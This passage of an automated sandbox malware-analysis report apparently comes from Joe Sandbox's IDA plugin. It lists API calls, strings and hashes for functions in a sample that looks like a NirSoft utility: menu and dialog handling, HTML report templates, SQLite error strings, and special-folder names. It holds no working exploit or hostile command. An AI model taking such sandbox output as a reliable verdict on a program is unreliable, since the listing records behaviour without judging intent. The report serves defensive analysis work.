                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                      • String ID: caption
                                                                                      • API String ID: 973020956-4135340389
                                                                                      • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                      • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                      APIs
                                                                                      Strings
                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                      • API String ID: 1283228442-2366825230
                                                                                      • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                      • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                      • String ID: \systemroot
                                                                                      • API String ID: 4173585201-1821301763
                                                                                      • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                      • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcscpy
                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                      • API String ID: 1284135714-318151290
                                                                                      • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                      • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                      • String ID: 0$6
                                                                                      • API String ID: 4066108131-3849865405
                                                                                      • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                      • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                      • memset.MSVCRT ref: 00408362
                                                                                      • memset.MSVCRT ref: 00408377
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 290601579-0
                                                                                      • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                      • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                      APIs
                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memchrmemset
                                                                                      • String ID: PD$PD
                                                                                      • API String ID: 1581201632-2312785699
                                                                                      • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                      • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                      • String ID:
                                                                                      • API String ID: 2163313125-0
                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 3592753638-3916222277
                                                                                      • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                      • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                      • String ID: %s (%s)$YV@
                                                                                      • API String ID: 3979103747-598926743
                                                                                      • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                      • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                      • API String ID: 2780580303-317687271
                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                      • API String ID: 2767993716-572158859
                                                                                      • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                      • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                      APIs
                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                      • API String ID: 3176057301-2039793938
                                                                                      • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                      • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                      APIs
                                                                                      Strings
                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                      • out of memory, xrefs: 0042F865
                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                      • database is already attached, xrefs: 0042F721
                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset
                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                      • API String ID: 1297977491-2001300268
                                                                                      • Opcode ID: 9fef2143278846cd95885c1cbe03afab34c3f4ef307752a183a19874e6a22e95
                                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                      • Opcode Fuzzy Hash: 9fef2143278846cd95885c1cbe03afab34c3f4ef307752a183a19874e6a22e95
                                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                      APIs
                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                      • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                      • String ID: ($d
                                                                                      • API String ID: 1140211610-1915259565
                                                                                      • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                      • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                      APIs
